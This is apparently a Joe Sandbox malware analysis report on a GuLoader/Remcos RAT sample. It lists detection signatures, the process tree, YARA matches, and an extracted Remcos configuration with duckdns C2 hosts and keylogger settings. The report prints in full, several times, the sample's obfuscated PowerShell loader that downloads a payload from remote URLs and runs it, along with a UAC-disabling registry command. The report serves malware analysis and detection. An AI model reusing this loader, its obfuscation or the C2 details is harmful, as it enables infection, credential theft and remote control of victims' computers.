Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe

Overview

General Information

Sample name:17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe
Analysis ID:1483073
MD5:3ad8cb387874a15488508bf269fd2520
SHA1:e083d92b7f1668b105c18ce5772caccc8705b903
SHA256:1b97d7dd602a1a105948d1607a6c8bc2014eb752078e35f839b4a5c5095a4e90
Tags:base64-decodedexe
Infos:

Detection

GuLoader, Remcos
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Contains functionality to bypass UAC (CMSTPLUA)
Detected unpacking (changes PE section rights)
Found malware configuration
Malicious sample detected (through community Yara rule)
Yara detected GuLoader
Yara detected Powershell download and execute
Yara detected Remcos RAT
Yara detected UAC Bypass using CMSTP
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Contains functionality to inject code into remote processes
Contains functionality to register a low level keyboard hook
Contains functionality to steal Chrome passwords or cookies
Contains functionality to steal Firefox passwords or cookies
Contains functionalty to change the wallpaper
Delayed program exit found
Found suspicious powershell code related to unpacking or dynamic code loading
Installs a global keyboard hook
Machine Learning detection for sample
Maps a DLL or memory area into another process
Obfuscated command line found
Potential malicious VBS script found (suspicious strings)
Queries sensitive service information (via WMI, WIN32_SERVICE, often done to detect sandboxes)
Sigma detected: Invoke-Obfuscation CLIP+ Launcher
Sigma detected: Invoke-Obfuscation VAR+ Launcher
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious Script Execution From Temp Folder
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Instant Messenger accounts or passwords
Tries to steal Mail credentials (via file / registry access)
Tries to steal Mail credentials (via file registry)
Uses dynamic DNS services
Very long command line found
Wscript starts Powershell (via cmd or directly)
Yara detected WebBrowserPassView password recovery tool
Contains functionality for read data from the clipboard
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to download and launch executables
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to enumerate running services
Contains functionality to launch a control a shell (cmd.exe)
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

  • System is w10x64
  • 17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe (PID: 4368 cmdline: "C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe" MD5: 3AD8CB387874A15488508BF269FD2520)
    • wscript.exe (PID: 6064 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\Forfrelsens.vbs" MD5: FF00E0480075B095948000BDC66E81F0)
      • powershell.exe (PID: 2064 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Revisoratets207 Smaatrykkene forlise Sujet Udvandringerne Wadies Thioantimonious Unparalysed Whiffer masseproduceres Entings Hebenon Zymin Dumpningsskibes Reobtainment Allingeboens Zinkkografierne Checksums Reverbrate Phare Spisekkkens Programredaktrs heteromorphous Sparkedragten0 Revisoratets207 Smaatrykkene forlise Sujet Udvandringerne Wadies Thioantimonious Unparalysed Whiffer masseproduceres Entings Hebenon Zymin Dumpningsskibes Reobtainment Allingeboens Zinkkografierne Checksums Reverbrate Phare Spisekkkens Programredaktrs heteromorphous Sparkedragten0';If (${host}.CurrentCulture) {$Digers++;}Function Svndyssendes94($Dukketeatrenes){$Uadskilleligt=$Dukketeatrenes.Length-$Digers;$Mainlining='SUBsTR';$Mainlining+='ing';For( $truthsman=1;$truthsman -lt $Uadskilleligt;$truthsman+=2){$Revisoratets207+=$Dukketeatrenes.$Mainlining.Invoke( $truthsman, $Digers);}$Revisoratets207;}function Scance($Strukturndringernes){ . ($Gederamsen) ($Strukturndringernes);}$Ambages77=Svndyssendes94 ' MIo zGi lKl,aL/C5F. 0R (.W iSn d o,wOs BNQT. R1 0,.v0P; ,W iBnO6 4D;S Uxy6 4M;, ,rSvM:T1 2.1..P0C) SGBeHc k o,/B2 0O1 0 0 1,0B1F IF i.rBeNf,oHxC/E1 2A1 .U0B ';$slotting=Svndyssendes94 '.UTsUe r.-FA g ern,ti ';$Udvandringerne=Svndyssendes94 ' h tTtjpAsA: /E/KaPs,oDc.i aRt i.a t r.aLd,i tGi.i m aArSi a...r o,/GoLs /,t r aDn.s.p o.rbtEm e,nNt...pAfPmM> hSt t pHs,:P/ /,n.e.w ..qCuPr aLnGu s hbaEi qGe r . oerFg..,s a./ wMpc- a.d m.iKnD/ToNs,e rCvDe /Rtdr,a nps.pro.r.tSm.e n tG. pHfTmI ';$Fluffs=Svndyssendes94 'S> ';$Gederamsen=Svndyssendes94 'Pi,e x ';$Lgnere='Unparalysed';$decos = Svndyssendes94 'Ee cMh,oS % a p pTdaaStSa % \FS n i g m yMr,dJe dPeA. SFkSo. ,& &H FeDc h.oU t ';Scance (Svndyssendes94 ',$ g lHo bOaAlC:PRge.gFr =h( c m,d, /Vc, .$ d.e.cBoBs,). ');Scance (Svndyssendes94 'E$SgElFo b.a lR:CS uLj.eFt,=S$SUTdKvFa,n,dIrDiOn.gSeLr,nSe .HsApGlAi tB( $ FJl.uOfNf.sD)p ');Scance (Svndyssendes94 ',[BN e,t .cS eorHvLi.cVe PSo iNn.tSMcaCn,aogAeKr,]S:D:OSPePc uPr.iKt y PDrCoBt o,cFool I=. C[SNNeLt ..S eBcHu rUi.t yMPMrMo.tKo,c o l.TVyGp e ]N:F:VTRl sR1F2E ');$Udvandringerne=$Sujet[0];$Respriser= (Svndyssendes94 ',$.gIl.o bRaBlP: Y m c a = N eIw -.OLb jbeMc t, S.yEsCt,e mH.RNUeStH.mW e.bRCKl i,e.nMt');$Respriser+=$Regr[1];Scance ($Respriser);Scance (Svndyssendes94 'A$ YDm.c,a .UHUeMaPd.e rSsA[ $FsJlIo tRt,i nKgP]d=,$OA,mTbFaSg e,sK7 7 ');$Genlydens=Svndyssendes94 'S$,Y,mTc,a..SD o,w nSl oFa d FSiBl e.(.$FU,d v aSnTd r i nOg.e rSnAeB,f$ PIruoHgAr a m r.eUdHaUk.t r,s )b ';$Programredaktrs=$Regr[0];Scance (Svndyssendes94 ' $ g lTo b a l,: SMaStWeBlSl i tP=,( Tse sAtT-ZPGaDtAh F$DPSr o g rAa mLrAe d,aAk tCrMs ) ');while (!$Satellit) {Scance (Svndyssendes94 'H$Bg lTo,b.a lH: Rie gOi oCn s.p lpaRnvrae t n iBn gBscl i.n.j.e =,$MtCrMuaeu ') ;Scance $Genlydens;Scance (Svndyssendes94 ',S tCa r,t -.Ssl,eOeSp .4N ');Scance (Svndyssendes94 'S$ gSlPoAbLaSlb:AS.a tTeSlNl,iSt =T(,T ecs tF- PSa,t.h, N$FPSr,oSg r a mGrmeGdJa kSt rSs )D ') ;Scance (Svndyssendes94 '.$Lg.l o,bha lD:VfRoSrVl i sAe.= $,g lBoSbAa,lV:FSAmOaGa t r.yEk,kse n eP+E+ %a$gSHu.jieHt .ScKoHu n,tH ') ;$Udvandringerne=$Sujet[$forlise];}$Hjsangs=362888;$Destalinising=27100;Scance (Svndyssendes94 'A$.g l oHb a l :SW h i f.fSe rP B=F G e t -DCFo n t,eFnNtW S$ PrrAo gSrHaSm rPe d aTkIt.rPsT ');Scance (Svndyssendes94 'N$og,l.oFbDaTlT:SFPoCr.l iNs E=H F[ S yRs.tce mS.CCPoAn.v eRr,tT] :,:,F r.o m B,aOs,e 6B4 SPtErFi.nOgD(F$ WVh icf fFehr,)L ');Scance (Svndyssendes94 'T$Bg lOo,bVa l :oHAeTbKeCn oGn =R F[.SBy.sPt e m..TT.e.x.t..VESn c.oGd,i n gD],:.:GA S CNIGI,. G eCt,SAt r.i n gG( $ FPo,r lliIsF) ');Scance (Svndyssendes94 'K$,gYlSoDb,a.lB:ODLe sNq uTa mFa tDiCoAn s = $ H.eLbYeHn oSnB.MsruFbMsPt rLiAnBg.( $.Hlj,s aAnSg sA,T$FD eTs tAaGlUi n ips i nugC)R ');Scance $Desquamations;" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • conhost.exe (PID: 2248 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • cmd.exe (PID: 1492 cmdline: "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Snigmyrdede.Sko && echo t" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • powershell.exe (PID: 5644 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Revisoratets207 Smaatrykkene forlise Sujet Udvandringerne Wadies Thioantimonious Unparalysed Whiffer masseproduceres Entings Hebenon Zymin Dumpningsskibes Reobtainment Allingeboens Zinkkografierne Checksums Reverbrate Phare Spisekkkens Programredaktrs heteromorphous Sparkedragten0 Revisoratets207 Smaatrykkene forlise Sujet Udvandringerne Wadies Thioantimonious Unparalysed Whiffer masseproduceres Entings Hebenon Zymin Dumpningsskibes Reobtainment Allingeboens Zinkkografierne Checksums Reverbrate Phare Spisekkkens Programredaktrs heteromorphous Sparkedragten0';If (${host}.CurrentCulture) {$Digers++;}Function Svndyssendes94($Dukketeatrenes){$Uadskilleligt=$Dukketeatrenes.Length-$Digers;$Mainlining='SUBsTR';$Mainlining+='ing';For( $truthsman=1;$truthsman -lt $Uadskilleligt;$truthsman+=2){$Revisoratets207+=$Dukketeatrenes.$Mainlining.Invoke( $truthsman, $Digers);}$Revisoratets207;}function Scance($Strukturndringernes){ . ($Gederamsen) ($Strukturndringernes);}$Ambages77=Svndyssendes94 ' MIo zGi lKl,aL/C5F. 0R (.W iSn d o,wOs BNQT. R1 0,.v0P; ,W iBnO6 4D;S Uxy6 4M;, ,rSvM:T1 2.1..P0C) SGBeHc k o,/B2 0O1 0 0 1,0B1F IF i.rBeNf,oHxC/E1 2A1 .U0B ';$slotting=Svndyssendes94 '.UTsUe r.-FA g ern,ti ';$Udvandringerne=Svndyssendes94 ' h tTtjpAsA: /E/KaPs,oDc.i aRt i.a t r.aLd,i tGi.i m aArSi a...r o,/GoLs /,t r aDn.s.p o.rbtEm e,nNt...pAfPmM> hSt t pHs,:P/ /,n.e.w ..qCuPr aLnGu s hbaEi qGe r . oerFg..,s a./ wMpc- a.d m.iKnD/ToNs,e rCvDe /Rtdr,a nps.pro.r.tSm.e n tG. pHfTmI ';$Fluffs=Svndyssendes94 'S> ';$Gederamsen=Svndyssendes94 'Pi,e x ';$Lgnere='Unparalysed';$decos = Svndyssendes94 'Ee cMh,oS % a p pTdaaStSa % \FS n i g m yMr,dJe dPeA. SFkSo. ,& &H FeDc h.oU t ';Scance (Svndyssendes94 ',$ g lHo bOaAlC:PRge.gFr =h( c m,d, /Vc, .$ d.e.cBoBs,). ');Scance (Svndyssendes94 'E$SgElFo b.a lR:CS uLj.eFt,=S$SUTdKvFa,n,dIrDiOn.gSeLr,nSe .HsApGlAi tB( $ FJl.uOfNf.sD)p ');Scance (Svndyssendes94 ',[BN e,t .cS eorHvLi.cVe PSo iNn.tSMcaCn,aogAeKr,]S:D:OSPePc uPr.iKt y PDrCoBt o,cFool I=. C[SNNeLt ..S eBcHu rUi.t yMPMrMo.tKo,c o l.TVyGp e ]N:F:VTRl sR1F2E ');$Udvandringerne=$Sujet[0];$Respriser= (Svndyssendes94 ',$.gIl.o bRaBlP: Y m c a = N eIw -.OLb jbeMc t, S.yEsCt,e mH.RNUeStH.mW e.bRCKl i,e.nMt');$Respriser+=$Regr[1];Scance ($Respriser);Scance (Svndyssendes94 'A$ YDm.c,a .UHUeMaPd.e rSsA[ $FsJlIo tRt,i nKgP]d=,$OA,mTbFaSg e,sK7 7 ');$Genlydens=Svndyssendes94 'S$,Y,mTc,a..SD o,w nSl oFa d FSiBl e.(.$FU,d v aSnTd r i nOg.e rSnAeB,f$ PIruoHgAr a m r.eUdHaUk.t r,s )b ';$Programredaktrs=$Regr[0];Scance (Svndyssendes94 ' $ g lTo b a l,: SMaStWeBlSl i tP=,( Tse sAtT-ZPGaDtAh F$DPSr o g rAa mLrAe d,aAk tCrMs ) ');while (!$Satellit) {Scance (Svndyssendes94 'H$Bg lTo,b.a lH: Rie gOi oCn s.p lpaRnvrae t n iBn gBscl i.n.j.e =,$MtCrMuaeu ') ;Scance $Genlydens;Scance (Svndyssendes94 ',S tCa r,t -.Ssl,eOeSp .4N ');Scance (Svndyssendes94 'S$ gSlPoAbLaSlb:AS.a tTeSlNl,iSt =T(,T ecs tF- PSa,t.h, N$FPSr,oSg r a mGrmeGdJa kSt rSs )D ') ;Scance (Svndyssendes94 '.$Lg.l o,bha lD:VfRoSrVl i sAe.= $,g lBoSbAa,lV:FSAmOaGa t r.yEk,kse n eP+E+ %a$gSHu.jieHt .ScKoHu n,tH ') ;$Udvandringerne=$Sujet[$forlise];}$Hjsangs=362888;$Destalinising=27100;Scance (Svndyssendes94 'A$.g l oHb a l :SW h i f.fSe rP B=F G e t -DCFo n t,eFnNtW S$ PrrAo gSrHaSm rPe d aTkIt.rPsT ');Scance (Svndyssendes94 'N$og,l.oFbDaTlT:SFPoCr.l iNs E=H F[ S yRs.tce mS.CCPoAn.v eRr,tT] :,:,F r.o m B,aOs,e 6B4 SPtErFi.nOgD(F$ WVh icf fFehr,)L ');Scance (Svndyssendes94 'T$Bg lOo,bVa l :oHAeTbKeCn oGn =R F[.SBy.sPt e m..TT.e.x.t..VESn c.oGd,i n gD],:.:GA S CNIGI,. G eCt,SAt r.i n gG( $ FPo,r lliIsF) ');Scance (Svndyssendes94 'K$,gYlSoDb,a.lB:ODLe sNq uTa mFa tDiCoAn s = $ H.eLbYeHn oSnB.MsruFbMsPt rLiAnBg.( $.Hlj,s aAnSg sA,T$FD eTs tAaGlUi n ips i nugC)R ');Scance $Desquamations;" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
          • cmd.exe (PID: 3520 cmdline: "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Snigmyrdede.Sko && echo t" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
NameDescriptionAttributionBlogpost URLsLink
Remcos, RemcosRATRemcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.
  • APT33
  • The Gorgon Group
  • UAC-0050
https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos
{"Version": "5.1.0 Pro", "Host:Port:Password": "iwarsut775laudrye2.duckdns.org:57484:0iwarsut775laudrye2.duckdns.org:57483:1iwarsut775laudrye3.duckdns.org:57484:0hjnourt38haoust1.duckdns.org:57484:0", "Assigned name": "MAGIC", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Enable", "Hide file": "Disable", "Mutex": "shietgtst-A57Q98", "Keylog flag": "1", "Keylog path": "AppData", "Keylog file": "sfvnspt.dat", "Keylog crypt": "Disable", "Hide keylog file": "Enable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}
SourceRuleDescriptionAuthorStrings
17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeJoeSecurity_RemcosYara detected Remcos RATJoe Security
    17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
      17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeWindows_Trojan_Remcos_b296e965unknownunknown
      • 0x6aaa8:$a1: Remcos restarted by watchdog!
      • 0x6b020:$a3: %02i:%02i:%02i:%03i
      17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeREMCOS_RAT_variantsunknownunknown
      • 0x64afc:$str_a1: C:\Windows\System32\cmd.exe
      • 0x64a78:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
      • 0x64a78:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
      • 0x64f78:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
      • 0x657a8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
      • 0x64b6c:$str_b2: Executing file:
      • 0x65bec:$str_b3: GetDirectListeningPort
      • 0x65598:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
      • 0x65718:$str_b7: \update.vbs
      • 0x64b94:$str_b9: Downloaded file:
      • 0x64b80:$str_b10: Downloading file:
      • 0x64c24:$str_b12: Failed to upload file:
      • 0x65bb4:$str_b13: StartForward
      • 0x65bd4:$str_b14: StopForward
      • 0x65670:$str_b15: fso.DeleteFile "
      • 0x65604:$str_b16: On Error Resume Next
      • 0x656a0:$str_b17: fso.DeleteFolder "
      • 0x64c14:$str_b18: Uploaded file:
      • 0x64bd4:$str_b19: Unable to delete:
      • 0x65638:$str_b20: while fso.FileExists("
      • 0x650b1:$str_c0: [Firefox StoredLogins not found]
      17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeINDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOMDetects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)ditekSHen
      • 0x649e8:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7}
      • 0x6497c:$s1: CoGetObject
      • 0x64990:$s1: CoGetObject
      • 0x649ac:$s1: CoGetObject
      • 0x6e938:$s1: CoGetObject
      • 0x6493c:$s2: Elevation:Administrator!new:
      SourceRuleDescriptionAuthorStrings
      C:\Users\user\AppData\Roaming\sfvnspt.datJoeSecurity_RemcosYara detected Remcos RATJoe Security
        SourceRuleDescriptionAuthorStrings
        00000000.00000000.2093024228.0000000000459000.00000002.00000001.01000000.00000003.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
          00000000.00000000.2093024228.0000000000459000.00000002.00000001.01000000.00000003.sdmpJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
            00000000.00000000.2093024228.0000000000459000.00000002.00000001.01000000.00000003.sdmpWindows_Trojan_Remcos_b296e965unknownunknown
            • 0x134a8:$a1: Remcos restarted by watchdog!
            • 0x13a20:$a3: %02i:%02i:%02i:%03i
            00000000.00000002.4549696326.000000000072E000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
              00000000.00000002.4543603879.0000000000459000.00000002.00000001.01000000.00000003.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
                Click to see the 30 entries
                SourceRuleDescriptionAuthorStrings
                0.0.17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe.400000.0.unpackJoeSecurity_RemcosYara detected Remcos RATJoe Security
                  0.0.17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe.400000.0.unpackJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
                    0.0.17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe.400000.0.unpackWindows_Trojan_Remcos_b296e965unknownunknown
                    • 0x6aaa8:$a1: Remcos restarted by watchdog!
                    • 0x6b020:$a3: %02i:%02i:%02i:%03i
                    0.0.17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe.400000.0.unpackREMCOS_RAT_variantsunknownunknown
                    • 0x64afc:$str_a1: C:\Windows\System32\cmd.exe
                    • 0x64a78:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
                    • 0x64a78:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
                    • 0x64f78:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
                    • 0x657a8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
                    • 0x64b6c:$str_b2: Executing file:
                    • 0x65bec:$str_b3: GetDirectListeningPort
                    • 0x65598:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
                    • 0x65718:$str_b7: \update.vbs
                    • 0x64b94:$str_b9: Downloaded file:
                    • 0x64b80:$str_b10: Downloading file:
                    • 0x64c24:$str_b12: Failed to upload file:
                    • 0x65bb4:$str_b13: StartForward
                    • 0x65bd4:$str_b14: StopForward
                    • 0x65670:$str_b15: fso.DeleteFile "
                    • 0x65604:$str_b16: On Error Resume Next
                    • 0x656a0:$str_b17: fso.DeleteFolder "
                    • 0x64c14:$str_b18: Uploaded file:
                    • 0x64bd4:$str_b19: Unable to delete:
                    • 0x65638:$str_b20: while fso.FileExists("
                    • 0x650b1:$str_c0: [Firefox StoredLogins not found]
                    0.0.17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe.400000.0.unpackINDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOMDetects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)ditekSHen
                    • 0x649e8:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7}
                    • 0x6497c:$s1: CoGetObject
                    • 0x64990:$s1: CoGetObject
                    • 0x649ac:$s1: CoGetObject
                    • 0x6e938:$s1: CoGetObject
                    • 0x6493c:$s2: Elevation:Administrator!new:
                    Click to see the 20 entries
                    SourceRuleDescriptionAuthorStrings
                    amsi32_2064.amsi.csvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
                      amsi32_2064.amsi.csvINDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
                      • 0xd961:$b2: ::FromBase64String(
                      • 0xad2f:$s1: -join
                      • 0x44db:$s4: +=
                      • 0x459d:$s4: +=
                      • 0x87c4:$s4: +=
                      • 0xa8e1:$s4: +=
                      • 0xabcb:$s4: +=
                      • 0xad11:$s4: +=
                      • 0xd0a6:$s4: +=
                      • 0xd126:$s4: +=
                      • 0xd1ec:$s4: +=
                      • 0xd26c:$s4: +=
                      • 0xd442:$s4: +=
                      • 0xd4c6:$s4: +=
                      • 0xb531:$e4: Get-WmiObject
                      • 0xb720:$e4: Get-Process
                      • 0xb778:$e4: Start-Process
                      amsi32_5644.amsi.csvINDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
                      • 0xa0d5:$b2: ::FromBase64String(
                      • 0x917b:$s1: -join
                      • 0x2927:$s4: +=
                      • 0x29e9:$s4: +=
                      • 0x6c10:$s4: +=
                      • 0x8d2d:$s4: +=
                      • 0x9017:$s4: +=
                      • 0x915d:$s4: +=
                      • 0x1246a:$s4: +=
                      • 0x124ea:$s4: +=
                      • 0x125b0:$s4: +=
                      • 0x12630:$s4: +=
                      • 0x12806:$s4: +=
                      • 0x1288a:$s4: +=
                      • 0x997d:$e4: Get-WmiObject
                      • 0x9b6c:$e4: Get-Process
                      • 0x9bc4:$e4: Start-Process
                      • 0x13113:$e4: Get-Process

                      System Summary

                      barindex
                      Source: Process startedAuthor: Jonathan Cheong, oscd.community: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Revisoratets207 Smaatrykkene forlise Sujet Udvandringerne Wadies Thioantimonious Unparalysed Whiffer masseproduceres Entings Hebenon Zymin Dumpningsskibes Reobtainment Allingeboens Zinkkografierne Checksums Reverbrate Phare Spisekkkens Programredaktrs heteromorphous Sparkedragten0 Revisoratets207 Smaatrykkene forlise Sujet Udvandringerne Wadies Thioantimonious Unparalysed Whiffer masseproduceres Entings Hebenon Zymin Dumpningsskibes Reobtainment Allingeboens Zinkkografierne Checksums Reverbrate Phare Spisekkkens Programredaktrs heteromorphous Sparkedragten0';If (${host}.CurrentCulture) {$Digers++;}Function Svndyssendes94($Dukketeatrenes){$Uadskilleligt=$Dukketeatrenes.Length-$Digers;$Mainlining='SUBsTR';$Mainlining+='ing';For( $truthsman=1;$truthsman -lt $Uadskilleligt;$truthsman+=2){$Revisoratets207+=$Dukketeatrenes.$Mainlining.Invoke( $truthsman, $Digers);}$Revisoratets207;}function Scance($Strukturndringernes){ . ($Gederamsen) ($Strukturndringernes);}$Ambages77=Svndyssendes94 ' MIo zGi lKl,aL/C5F. 0R (.W iSn d o,wOs BNQT. R1 0,.v0P; ,W iBnO6 4D;S Uxy6 4M;, ,rSvM:T1 2.1..P0C) SGBeHc k o,/B2 0O1 0 0 1,0B1F IF i.rBeNf,oHxC/E1 2A1 .U0B ';$slotting=Svndyssendes94 '.UTsUe r.-FA g ern,ti ';$Udvandringerne=Svndyssendes94 ' h tTtjpAsA: /E/KaPs,oDc.i aRt i.a t r.aLd,i tGi.i m aArSi a...r o,/GoLs /,t r aDn.s.p o.rbtEm e,nNt...pAfPmM> hSt t pHs,:P/ /,n.e.w ..qCuPr aLnGu s hbaEi qGe r . oerFg..,s a./ wMpc- a.d m.iKnD/ToNs,e rCvDe /Rtdr,a nps.pro.r.tSm.e n tG. pHfTmI ';$Fluffs=Svndyssendes94 'S> ';$Gederamsen=Svndyssendes94 'Pi,e x ';$Lgnere='Unparalysed';$decos = Svndyssendes94 'Ee cMh,oS % a p pTdaaStSa % \FS n i g m yMr,dJe dPeA. SFkSo. ,& &H FeDc h.oU t ';Scance (Svndyssendes94 ',$ g lHo bOaAlC:PRge.gFr =h( c m,d, /Vc, .$ d.e.cBoBs,). ');Scance (Svndyssendes94 'E$SgElFo b.a lR:CS uLj.eFt,=S$SUTdKvFa,n,dIrDiOn.gSeLr,nSe .HsApGlAi tB( $ FJl.uOfNf.sD)p ');Scance (Svndyssendes94 ',[BN e,t .cS eorHvLi.cVe PSo iNn.tSMcaCn,aogAeKr,]S:D:OSPePc uPr.iKt y PDrCoBt o,cFool I=. C[SNNeLt ..S eBcHu rUi.t yMPMrMo.tKo,c o l.TVyGp e ]N:F:VTRl sR1F2E ');$Udvandringerne=$Sujet[0];$Respriser= (Svndyssendes94 ',$.gIl.o bRaBlP: Y m c a = N eIw -.OLb jbeMc t, S.yEsCt,e mH.RNUeStH.mW e.bRCKl i,e.nMt');$Respriser+=$Regr[1];Scance ($Respriser);Scance (Svndyssendes94 'A$ YDm.c,a .UHUeMaPd.e rSsA[ $FsJlIo tRt,i nKgP]d=,$OA,mTbFaSg e,sK7 7 ');$Genlydens=Svndyssendes94 'S$,Y,mTc,a..SD o,w nSl oFa d FSiBl e.(.$FU,d v aSnTd r i nOg.e rSnAeB,f$ PIruoHgAr a m r.eUdHaUk.t r,s )b ';$Programredaktrs=$Regr[0];Scance (Svndyssendes94 ' $ g lTo b a l,: SMaStWeBlSl i tP=,( Tse sAtT-ZPGaDtAh F$DPSr o g rAa mLrAe d,aAk tCrMs ) ');while (!$Satellit) {Scance (Svndyssendes94 'H$Bg lTo,b.a lH: Rie gOi oCn 